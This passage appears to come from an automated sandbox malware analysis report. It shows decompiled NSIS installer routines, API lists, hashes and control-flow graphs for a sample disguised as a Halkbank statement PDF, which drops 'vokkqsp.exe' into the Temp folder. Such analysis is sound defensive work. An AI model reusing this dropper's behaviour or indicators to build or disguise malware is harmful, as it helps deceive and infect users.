					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                      0x0040176f
                                                      0x00401776
                                                      0x00401782
                                                      0x00401785
                                                      0x0040178a
                                                      0x0040178d
                                                      0x00401794
                                                      0x004017b0
                                                      0x00401796
                                                      0x00401797
                                                      0x00401797
                                                      0x004017b6
                                                      0x004017bb
                                                      0x004017bb
                                                      0x004017bf
                                                      0x004017c2
                                                      0x004017c7
                                                      0x004017c9
                                                      0x004017cb
                                                      0x004017d0
                                                      0x004017d0
                                                      0x004017db
                                                      0x004017db
                                                      0x004017ec
                                                      0x004017ee
                                                      0x004017ee
                                                      0x004017ef
                                                      0x004017ef
                                                      0x004017f2
                                                      0x004017f5
                                                      0x004017f8
                                                      0x004017f8
                                                      0x004017ff
                                                      0x0040180e
                                                      0x00401813
                                                      0x00401816
                                                      0x00401819
                                                      0x00000000
                                                      0x00000000
                                                      0x0040181b
                                                      0x0040181e
                                                      0x00401874
                                                      0x00401879
                                                      0x004015b6
                                                      0x0040292e
                                                      0x0040292e
                                                      0x00402c2a
                                                      0x00402c2d
                                                      0x00402c2d
                                                      0x00000000
                                                      0x00401820
                                                      0x00401826
                                                      0x0040182d
                                                      0x0040183a
                                                      0x00401845
                                                      0x0040185b
                                                      0x0040185b
                                                      0x0040185e
                                                      0x00000000
                                                      0x00401864
                                                      0x00401864
                                                      0x00401865
                                                      0x00401882
                                                      0x00402c33
                                                      0x00402c33
                                                      0x00402c33
                                                      0x00401867
                                                      0x00401867
                                                      0x00401868
                                                      0x00401493
                                                      0x0040239d
                                                      0x0040239d
                                                      0x0040239d
                                                      0x00401865
                                                      0x0040185e
                                                      0x00402c35
                                                      0x00402c39
                                                      0x00402c39
                                                      0x00401892
                                                      0x00401897
                                                      0x004018a5
                                                      0x004018aa
                                                      0x004018b0
                                                      0x004018b4
                                                      0x004018b6
                                                      0x004018be
                                                      0x004018ca
                                                      0x004018b8
                                                      0x004018b8
                                                      0x004018bc
                                                      0x00000000
                                                      0x00000000
                                                      0x004018bc
                                                      0x004018d3
                                                      0x004018d9
                                                      0x004018db
                                                      0x00000000
                                                      0x004018e1
                                                      0x004018e1
                                                      0x004018e4
                                                      0x004018fc
                                                      0x004018e6
                                                      0x004018e9
                                                      0x004018f2
                                                      0x004018f2
                                                      0x00401901
                                                      0x00401906
                                                      0x00402398
                                                      0x00000000
                                                      0x00402398
                                                      0x00000000

                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                      • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00000000,00000000,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                        • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                      • API String ID: 1941528284-227601704
                                                      • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                      • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                      • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                      • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                      C-Code - Quality: 100%
                                                      			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                      0x004069dc
                                                      0x004069e5
                                                      0x004069e7
                                                      0x004069e7
                                                      0x004069eb
                                                      0x004069fe
                                                      0x004069f8
                                                      0x004069f8
                                                      0x004069f8
                                                      0x00406a17
                                                      0x00406a2b
                                                      0x00406a32

                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                      • wsprintfW.USER32 ref: 00406A17
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                      • String ID: %s%S.dll$UXTHEME$\
                                                      • API String ID: 2200240437-1946221925
                                                      • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                      • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                      • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                      • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                      C-Code - Quality: 100%
                                                      			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                      0x00405ba4
                                                      0x00405ba8
                                                      0x00405bab
                                                      0x00405bb1
                                                      0x00405bb5
                                                      0x00405bb9
                                                      0x00405bc1
                                                      0x00405bc8
                                                      0x00405bce
                                                      0x00405bd5
                                                      0x00405bdc
                                                      0x00405be4
                                                      0x00405be6
                                                      0x00000000
                                                      0x00405be6
                                                      0x00405bf0
                                                      0x00405bf7
                                                      0x00405c0d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405c0f
                                                      0x00405c13

                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                      • GetLastError.KERNEL32 ref: 00405BF0
                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                      • GetLastError.KERNEL32 ref: 00405C0F
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 3449924974-3081826266
                                                      • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                      • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                      • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                      • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 538 403479-4034a1 GetTickCount 539 4035d1-4035d9 call 40302e 538->539 540 4034a7-4034d2 call 4035f8 SetFilePointer 538->540 545 4035db-4035df 539->545 546 4034d7-4034e9 540->546 547 4034eb 546->547 548 4034ed-4034fb call 4035e2 546->548 547->548 551 403501-40350d 548->551 552 4035c3-4035c6 548->552 553 403513-403519 551->553 552->545 554 403544-403560 call 406bb0 553->554 555 40351b-403521 553->555 561 403562-40356a 554->561 562 4035cc 554->562 555->554 556 403523-403543 call 40302e 555->556 556->554 564 40356c-403574 call 40620a 561->564 565 40358d-403593 561->565 563 4035ce-4035cf 562->563 563->545 569 403579-40357b 564->569 565->562 566 403595-403597 565->566 566->562 568 403599-4035ac 566->568 568->546 570 4035b2-4035c1 SetFilePointer 568->570 571 4035c8-4035ca 569->571 572 40357d-403589 569->572 570->539 571->563 572->553 573 40358b 572->573 573->568
                                                      C-Code - Quality: 93%
                                                      			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40e158
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                                      0x00403489
                                                      0x0040349c
                                                      0x004034a1
                                                      0x004035d1
                                                      0x004035d3
                                                      0x00000000
                                                      0x004035d9
                                                      0x004034ad
                                                      0x004034c0
                                                      0x004034c6
                                                      0x004034cc
                                                      0x004034d7
                                                      0x004034dc
                                                      0x004034e1
                                                      0x004034e9
                                                      0x004034eb
                                                      0x004034eb
                                                      0x004034f4
                                                      0x004034fb
                                                      0x00000000
                                                      0x00000000
                                                      0x00403501
                                                      0x00403507
                                                      0x0040350d
                                                      0x00000000
                                                      0x00403513
                                                      0x00403519
                                                      0x00403539
                                                      0x0040353e
                                                      0x00403543
                                                      0x00403549
                                                      0x0040354f
                                                      0x00403559
                                                      0x00403560
                                                      0x00000000
                                                      0x00000000
                                                      0x00403562
                                                      0x00403568
                                                      0x0040356a
                                                      0x0040358d
                                                      0x00403593
                                                      0x00000000
                                                      0x00000000
                                                      0x00403595
                                                      0x00403597
                                                      0x00000000
                                                      0x00000000
                                                      0x00403599
                                                      0x00403599
                                                      0x004035ac
                                                      0x00000000
                                                      0x00000000
                                                      0x004035bb
                                                      0x00000000
                                                      0x004035bb
                                                      0x00403574
                                                      0x0040357b
                                                      0x004035c8
                                                      0x004035ce
                                                      0x004035ce
                                                      0x00000000
                                                      0x004035ce
                                                      0x0040357d
                                                      0x00403583
                                                      0x00403589
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004035cc
                                                      0x004035cc
                                                      0x00000000
                                                      0x004035cc
                                                      0x00000000

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 0040348D
                                                        • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: FilePointer$CountTick
                                                      • String ID: X@
                                                      • API String ID: 1092082344-2850556465
                                                      • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                      • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                      • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                      • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 574 406187-406193 575 406194-4061c8 GetTickCount GetTempFileNameW 574->575 576 4061d7-4061d9 575->576 577 4061ca-4061cc 575->577 579 4061d1-4061d4 576->579 577->575 578 4061ce 577->578 578->579
                                                      C-Code - Quality: 100%
                                                      			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                      0x0040618d
                                                      0x00406193
                                                      0x00406194
                                                      0x00406194
                                                      0x00406199
                                                      0x0040619a
                                                      0x0040619d
                                                      0x004061a2
                                                      0x004061a5
                                                      0x004061af
                                                      0x004061bc
                                                      0x004061c0
                                                      0x004061c8
                                                      0x00000000
                                                      0x00000000
                                                      0x004061cc
                                                      0x00000000
                                                      0x004061ce
                                                      0x004061ce
                                                      0x004061ce
                                                      0x004061d1
                                                      0x004061d4
                                                      0x004061d4
                                                      0x004061d7
                                                      0x00000000

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004061A5
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-678247507
                                                      • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                      • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                      • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                      • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 580 403c25-403c34 581 403c40-403c48 580->581 582 403c36-403c39 CloseHandle 580->582 583 403c54-403c60 call 403c82 call 405d74 581->583 584 403c4a-403c4d CloseHandle 581->584 582->581 588 403c65-403c66 583->588 584->583
                                                      C-Code - Quality: 100%
                                                      			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsvF67F.tmp\\", 7); // executed
				return _t4;
			}







                                                      0x00403c25
                                                      0x00403c34
                                                      0x00403c37
                                                      0x00403c39
                                                      0x00403c39
                                                      0x00403c40
                                                      0x00403c48
                                                      0x00403c4b
                                                      0x00403c4d
                                                      0x00403c4d
                                                      0x00403c4d
                                                      0x00403c54
                                                      0x00403c60
                                                      0x00403c66

                                                      APIs
                                                      • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                      • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\nsvF67F.tmp\, xrefs: 00403C5B
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
